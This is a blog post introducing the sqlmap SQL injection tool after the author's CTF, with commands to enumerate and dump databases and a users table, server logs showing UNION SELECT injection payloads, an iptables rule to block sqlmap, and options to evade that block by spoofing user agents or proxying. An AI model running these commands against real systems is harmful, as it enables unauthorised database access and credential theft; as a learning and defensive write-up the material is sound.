Recently, I was doing a CTF (article here) and used sqlmap for the first time. When I used it, I wasn’t too sure what all was going on, so I thought it would be a good idea to do a writeup about it. I’ve decided to make a new series called “Tool Time“ where I introduce you (and sometimes me) to a security tool. In general, these articles will serve as a good introduction into the tool (basic source data, how to use it and some random information).

I’m going to attempt to develop out a format for these articles for consistency. As this is the first one, future articles may change.

Better Know Your Tool

Site: sqlmap on GitHub

Twitter: @sqlmap

Language: Python (2.6.x and 2.7.x)

Kali included: yes (just run sqlmap)

What is sqlmap?

It’s a tool to detect and exploit SQL injection vulnerabilities in database servers.

This tool can do a lot, so it’s best to spend some time looking into all of the options.

Where’s Help?

$ sqlmap -hh

That command (or python -hh) will give you all of the options/switches. You can use -h instead, which will give you less information.

Key Features

If you want all of the features, take a look at their WIKI. There’s a lot listed.

Sqlmap supports many database management systems, such as MySQL, Oracle, Microsoft SQL Server, etc.

It can enumerate users, passwords, hashing, tables, columns and more. It can also connect directly to the DB.

And it can search for specific database names, tables and columns.

Using sqlmap

Here’s a quick example of using sqlmap.

Getting initial DB information:

$ sqlmap -u http://mytarget/login.php --data="user=1&password=1&s=Submit"

Getting a list of databases on the system (MySQL):

$ sqlmap  -u "http://mytarget/login.php" --data="user=1&password=1&s=Submit" --dbms=mysql --dbs

Getting tables inside of a database (MyWordpressDB):

$ sqlmap -u http://mytarget/login.php --data="user=1&password=1&s=Submit" --dbms=mysql --tables -D MyWordpressDB

Getting data inside of a table (users):

$ sqlmap -u http://mytarget/login.php --data="user=1&password=1&s=Submit" --dbms=mysql --dump --T users -D MyWordpressDB

Another example would be just pointing -u to a page that takes a GET parameter and going from there.

Server logs

Using sqlmap is pretty loud. I pointed it at my test wordress VM and just ran the initial check (telling sqlmap that I was using MySQL).

The result was something like 100+ log entries instantly like this:

3 - - [01/Aug/2015:16:23:38 -0700] "POST /wp-login.php HTTP/1.1" 200 1568 "-" "sqlmap/1.0-dev-nongit-20150719 ("
... - - [01/Aug/2015:16:28:52 -0700] "GET /?s=lkk%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 HTTP/1.1" 200 3300 "-" "sqlmap/1.0-dev-git-20150719 ("

IP Tables

After testing this tool against one of my VMs, my next task was to update my IP TABLES to detect sqlmap.

Here’s a real quick n dirty example:

$ sudo iptables -I INPUT -p tcp --dport 80 -m string --algo bm --string "" -j DROP

This rule looks for in the tcp request on port 80 and drops it. Of course, if you have any other request come in with that text that happens to be legitimate, it’s gone too.

So now that sqlmap is blocked, what now? Random agents.

$ sqlmap -u --dbms=MySQL --random-agent

And now the log will look something like:

5 - - [01/Aug/2015:17:12:13 -0700] "GET /?s=lkk%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1" 200 3308 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20091201 MRA 5.5 (build 02842) Firefox/3.5.6"

or - - [01/Aug/2015:17:12:07 -0700] "GET /?s=-1322%20ORDER%20BY%201%23 HTTP/1.1" 200 3268 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20091201 MRA 5.5 (build 02842) Firefox/3.5.6"

Of interest will be options:

  • random-agent (use a randomly selected HTTP UA value)
  • user-agent=WHATEVER (passing in a specific UA to use)
  • host=WHATEVER (HTTP Host header value)
  • referer=WHATEVER (HTTP referer value)
  • proxy=PROXY (Use a proxy to connect to target)